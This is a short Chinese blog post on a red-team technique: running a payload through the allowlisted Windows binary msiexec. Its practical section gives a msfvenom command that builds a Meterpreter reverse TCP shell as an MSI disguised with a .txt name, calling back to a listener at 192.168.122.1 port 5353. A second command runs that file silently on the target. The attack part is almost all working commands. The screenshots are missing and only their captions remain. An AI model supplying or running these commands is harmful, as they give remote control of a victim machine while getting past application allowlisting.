白名单执行payload之Msiexec

简介

Msiexec 是 Windows Installer 的一部分。用于安装 Windows Installer 安装包(MSI),一般在运行 Microsoft Update 安装更新或安装部分软件的时候出现,占用内存比较大。并且集成于 Windows 2003,Windows 7 等

已添加环境变量,路径如下:
C:WINDOWSsystem32msiexec.exe
C:WINDOWSSysWOW64msiexec.exe

实际使用

msf设置监听如下:


如下生成msi文件:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.122.1 lport=5353 -f msi > 5353.txt


目标机器执行后确认上线如下:
msiexec /q /i  5353.txt

联系邮箱:yang_s1r@163.com 博客园地址:https://www.cnblogs.com/Yang34/
【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/Yang34/p/14406844.html